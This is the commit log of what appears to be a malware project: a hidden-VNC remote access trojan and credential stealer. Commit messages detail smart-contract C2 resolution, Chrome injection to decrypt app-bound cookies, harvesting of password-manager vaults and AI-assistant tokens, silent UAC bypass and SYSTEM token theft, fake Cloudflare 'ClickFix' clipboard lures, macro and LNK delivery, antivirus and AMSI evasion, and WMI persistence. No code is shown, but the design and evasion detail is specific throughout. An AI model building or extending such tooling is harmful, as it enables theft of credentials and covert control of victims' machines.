Commit Graph
28 Commits
Author SHA1 Message Date
JYenn 13e6ad7063 EtherHiding C2: resolve the TCP endpoint from a smart contract
The agent resolves its C2 endpoint from a resolver contract on a public
chain via eth_call (free, read-only), so the compiled binary carries no C2
address; rotating the C2 is one contract call and every bot picks up the
new value on next start. Pattern per the 2026 Remus analysis: eth_call
with the get() selector (0x6d4ce63c) against a public JSON-RPC provider,
the endpoint stored as a bytes32 host:port. Any failure falls back to the
compiled endpoint.

- src/transport/etherhiding.cpp/hpp: eth_call resolver, bytes32 decode,
  host:port parse, WinHTTP POST with hard timeouts
- agent: resolves before the argv/env override so an explicit endpoint
  still wins; HVNC_CHAIN_RPC / HVNC_CHAIN_CONTRACT env vars override
- setup.py: CHAIN_RPC / CHAIN_CONTRACT options; the guided wizard asks for
  the resolver under TCP; the summary and recreate line carry them
- tools/etherhiding.py: read (stdlib) and update (web3 optional, explorer
  instructions otherwise); contract source included, deployed via Remix
- verified: selectors checked against a real keccak implementation,
  contract compiles with solc 0.8.19, wizard and non-interactive flows
  emit the config end to end, mock RPC positive/negative tests, live
  HTTPS RPC probe degrades gracefully, and the full steal still recovers
  the v20 key through the chain-resolved agent
2026-08-20 22:39:40 +01:00
JYenn 8ee9393ea4 restore the proven v20 flow; drop the fork+APC experiment
The v20 master key is recovered the proven way: the agent spawns Chrome
suspended, reflectively injects the payload DLL, and the payload decrypts
the app-bound key through the COM IElevator inside the browser, pipes the
full loot back, and the agent terminates the host. The offline agent falls
back to the DPAPI v10 key. Verified on the box: identical loot across runs,
144 real v20 cookies decrypted to plaintext.

The Vidar-style fork+APC experiment is removed entirely, including its
syscall wrappers; the syscall engine is back to the pre-ABE baseline. What
the experiment taught is recorded in FUTURE_ADDITIONS: CryptProtectMemory
lives in crypt32/dpapi not kernel32, special user APCs are rejected for CET
threads, NtCreateProcessEx forks crash Chrome 151, elevated browsers refuse
access from a medium-integrity agent, and re-encrypting an unchanged buffer
corrupts live browser memory.

Diagnostics kept: inject errors surface in the loot instead of silently
falling back, and the payload reports an empty loot explicitly.
2026-08-20 22:11:17 +01:00
JYenn 9f883a64ef stealer: keep only lastpass/credman/protonpass with raw vault capture; drop bitwarden/1password/dashlane/nordpass/keeper/enpass/roboform (no at-rest break, unverified); pm_store_raw carries leveldb/sqlite blobs for offline crack (hashcat -m 6800, proton bcrypt user key); pretty-print loot json objects, terminal hides raw b64 2026-08-18 23:37:30 +01:00
JYenn 99dfeec1df stealer: drop keepass + filezilla harvesters (KeePass never persists master passwords, FileZilla unverified); downgrade riot/roblox to raw-evidence mode; rockstar SSO cookies from CEF cookie DB (full 32-byte host-hash prefix), battlenet HKLM TLS identity; credman binary blobs base64'd, json_escape high-byte escapes 2026-08-18 22:43:19 +01:00
JYenn 52ae8479e6 stealer: loot json grouped as password_managers/games/network_clients/ai_assistants; mremoteng + mobaxterm v26 decryptors (dpapi entropy, aes cbc/cfb8/ecb, gcm-full, pbkdf2-sha1, master-pwd note); battle.net/rockstar harvesters fixed to real data locations (localappdata cache, programdata agent/settings, documents saves); ai-assistant harvest (claude desktop leveldb token, codex auth.json, gemini config/history, opencode auth.json); console app count + robot icons; readme harvest groups 2026-08-18 11:25:00 +01:00
JYenn c5a859ba82 readme: tagline, emoji bullets, de-dup features vs how-it-works, vt section, personal note, tightened wrappers prose, unslopped 2026-08-18 00:19:55 +01:00
JYenn c458ffd065 docs: demo gif, readme rewrite, loopback examples, gitignore console history 2026-08-16 22:07:01 +01:00
JYenn 510cc30fe6 wrappers: docm/xlsm macros from office-authored compiled bases (pyopenvba rebuilds write source-only streams whose auto-events never hook - root-caused and verified live), inject runtime url+filename into word docvars / excel cfg-sheet cells instead of rewriting vba; drop pptm (auto_open never fires, thispresentation unauthorable via automation); bases ship in wrappers_bases/; readme updated 2026-08-16 20:33:34 +01:00
JYenn 666fa30e69 wrappers: move lnk chain to companion .cmd (av fastpath flags any lnk-launched curl cmdline), chr-encode vba cradles for amsi/content scans, fluid clickfix layout, decoy pdf body text; docs: comment cleanup across sources (stale/duplicate/verbose), readme corrections (polyglot_exe_zip stage_url, full command table) 2026-08-16 17:38:41 +01:00
JYenn 921006eaae cradles: drop powershell -enc for cmd/curl chains (av flags the ps forms); readme: trim av research bloat 2026-08-16 15:25:21 +01:00
JYenn b9038cf239 payload wrappers: clickfix_html format - fake Cloudflare 'Verify you are human' page that poisons the clipboard with a hidden PowerShell cradle on the checkbox click and shows Win+R / Ctrl+V / Enter steps; command rides XOR 0x83 + hex like the in-the-wild kits, headless and non-Windows visitors get a benign spinner (per 2026 ClickFix lures: Rapid7 DoubleDonut, MS Threat Intel, PhishEye BW kit); verified 61/61 in the end-to-end harness plus real-JS DOM run (both copy APIs fire, gate works) 2026-08-16 14:29:13 +01:00
JYenn 1776789ed7 payload wrappers: lnk opens an embedded decoy PDF before the cradle (decoy-first, per 2026 DPRK/Patchwork/MoonPeak LNK chains), lnk/polyglot_exe_zip now need pikepdf; docm/xlsm/pptm decoys upgraded (docx core props, xlsm currency format/bold header/widths, pptm fills template slide 0), decoy pool normalized to title/body pairs, html/polyglot_html pages show the decoy text; README: MOTW delivery notes + refreshed operator view screenshot (renamed MiseryOperatorView.png) 2026-08-16 04:53:04 +01:00
JYenn a88718429e payload wrappers: 9 filetype delivery formats via setup.py -p (docm/xlsm/pptm macros with real decoy content, lnk cradle, pdf attachment+OpenAction, OneDrive-style html smuggle, iso, exe+zip and exe+html polyglots), STAGE_URL option, --list-formats, per-format manifest entries, README section 2026-08-16 04:37:01 +01:00
JYenn 198f1fcdab elevation: silent UAC bypass (PEB masquerade + CMSTPLUA/ICMLuaUtil) and SYSTEM token theft; wire elevate command 2026-08-16 01:12:29 +01:00
JYenn 8e64b360d7 ghost: seed sign-in cookies via CDP; Edge ABE vtable fix, 24H2 syscall sizes, relay chunked bodies 2026-08-16 00:29:40 +01:00
JYenn 4073f259f3 docs: rewrite README (features, quick start, build, layout); correct hidden-desktop claims 2026-08-15 15:28:50 +01:00
JYenn 480c89ce6e cdp: occluded-renderer freeze fix; reattach/relaunch recovery; ghost nav, hvnc quality 2026-08-15 15:14:31 +01:00
JYenn c559212825 build result text once; drop crash.log from repo 2026-08-15 05:33:30 +01:00
JYenn 61b5cd0caf docs: correct session table for CDP-rendered interactive browser; tidy hvnc code 2026-08-15 05:18:14 +01:00
JYenn eb11e8ae79 hvnc: correct input synthesis (client coords, key lparam, real focus), stable diff resync; ghost profile-copy, beacon jitter/batching, console view rework 2026-08-15 03:38:13 +01:00
JYenn e549daeb4d docs: list harvested browsers and apps in stealer bullet 2026-08-15 00:32:16 +01:00
JYenn 4a3e3f1307 docs: restore README image sections 2026-08-15 00:31:08 +01:00
JYenn f3587510c7 docs: rewrite README with a feature bullet list 2026-08-15 00:30:26 +01:00
JYenn a7f0b17fef transport: ECDH P-256 key agreement, drop baked-in master key
setup.py now generates a P-256 console keypair: the public half compiles into config.h, the private half persists to .misery_key (gitignored, chmod 600) and is loaded by the console at runtime. Agent and console agree a per-connection AES-256-GCM session key from an ECDH handshake (plaintext KEY_EXCHANGE frame on TCP, ephemeral-pubkey prefix on beacon polls), so no secret key material ships in a binary. KEY= option removed; --rotate-key rotates the keypair.
2026-08-14 23:14:06 +01:00
JYenn 68b88f52c7 docs: tighten README wording
Fix the Ek0m attribution before/after apostrophe, reword the WMI guard explanation so it says what it does, and swap 'reports in' for 'checks in'.
2026-08-14 22:25:04 +01:00
JYenn 009d7a2b1f agent: anti-analysis fingerprinting and self-healing WMI persistence
Add a user-mode environment check (CPUID, firmware tables, MAC OUIs, guest drivers, PEB flags, debug-port queries, tool scans) that gates the TCP reconnect backoff. Extend debugger_present() with ProcessDebugObjectHandle (0x1E). Add WMI event subscriptions (T1546.003): a 15-minute timer relaunch plus a Run-key guard that recreates a deleted value, backed by an idempotent Run write that cannot retrigger itself. Document both in the README.
2026-08-14 22:21:45 +01:00
JYenn 0003817596 Console beacon transport: HTTP relay front-end, outbox queue, REGISTER on beacon poll 2026-08-14 20:44:04 +01:00
JYenn ff4dbf3f2b HVNC + Misery: hidden-desktop and ghosted browser sessions with encrypted C2 2026-08-14 20:21:41 +01:00